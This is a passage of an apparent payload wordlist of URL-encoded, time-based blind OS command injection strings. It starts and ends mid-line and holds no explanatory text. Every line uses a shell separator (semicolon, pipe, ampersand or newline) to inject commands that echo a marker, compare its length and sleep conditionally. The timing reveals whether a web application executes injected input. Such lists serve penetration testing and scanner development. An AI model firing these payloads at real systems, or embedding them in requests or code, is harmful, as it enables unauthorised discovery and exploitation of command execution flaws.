hen%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20HNLFQM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20HNLFQM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20HNLFQM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20HNLFQM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20HNLFQM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20HNLFQM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20HNLFQM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%7C%20%5B%201%20-ne%20%24%28echo%20HHUNZT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%202%20-ne%20%24%28echo%20HHUNZT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%203%20-ne%20%24%28echo%20HHUNZT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%204%20-ne%20%24%28echo%20HHUNZT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%205%20-ne%20%24%28echo%20HHUNZT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%206%20-ne%20%24%28echo%20HHUNZT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%207%20-ne%20%24%28echo%20HHUNZT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%208%20-ne%20%24%28echo%20HHUNZT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%209%20-ne%20%24%28echo%20HHUNZT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZPLJWX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZPLJWX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZPLJWX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZPLJWX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZPLJWX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZPLJWX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZPLJWX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZPLJWX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZPLJWX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%3B%20str%3D%24%28echo%20KFNNBY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20KFNNBY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20KFNNBY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20KFNNBY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20KFNNBY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20KFNNBY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20KFNNBY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20KFNNBY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20KFNNBY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%7C%20%5B%201%20-ne%20%24%28echo%20MCLZRV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%202%20-ne%20%24%28echo%20MCLZRV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%203%20-ne%20%24%28echo%20MCLZRV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%204%20-ne%20%24%28echo%20MCLZRV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%205%20-ne%20%24%28echo%20MCLZRV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%206%20-ne%20%24%28echo%20MCLZRV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%207%20-ne%20%24%28echo%20MCLZRV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%208%20-ne%20%24%28echo%20MCLZRV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%209%20-ne%20%24%28echo%20MCLZRV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAGBBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAGBBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAGBBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAGBBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAGBBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAGBBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAGBBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAGBBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAGBBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%0A%20str%3D%24%28echo%20HHRCUR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20HHRCUR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20HHRCUR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20HHRCUR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20HHRCUR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20HHRCUR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20HHRCUR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20HHRCUR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20HHRCUR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%3B%20str%3D%24%28echo%20GZPDPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20GZPDPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20GZPDPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20GZPDPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20GZPDPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20GZPDPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20GZPDPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20GZPDPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20GZPDPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%7C%20%5B%201%20-ne%20%24%28echo%20JXWDPO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%202%20-ne%20%24%28echo%20JXWDPO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%203%20-ne%20%24%28echo%20JXWDPO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%204%20-ne%20%24%28echo%20JXWDPO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%205%20-ne%20%24%28echo%20JXWDPO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%206%20-ne%20%24%28echo%20JXWDPO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%207%20-ne%20%24%28echo%20JXWDPO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%208%20-ne%20%24%28echo%20JXWDPO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%209%20-ne%20%24%28echo%20JXWDPO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QUSUIJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QUSUIJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QUSUIJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QUSUIJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QUSUIJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QUSUIJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QUSUIJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QUSUIJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QUSUIJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%0A%20str%3D%24%28echo%20GJANGU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GJANGU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GJANGU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GJANGU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GJANGU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GJANGU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GJANGU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GJANGU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GJANGU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%3B%20str%3D%24%28echo%20KKIQNH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20KKIQNH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20KKIQNH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20KKIQNH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20KKIQNH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20KKIQNH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20KKIQNH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20KKIQNH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20KKIQNH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%7C%20%5B%201%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%202%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%203%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%204%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%205%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%206%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%207%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%208%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%209%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UGGXTG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UGGXTG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UGGXTG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UGGXTG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UGGXTG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UGGXTG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UGGXTG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UGGXTG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B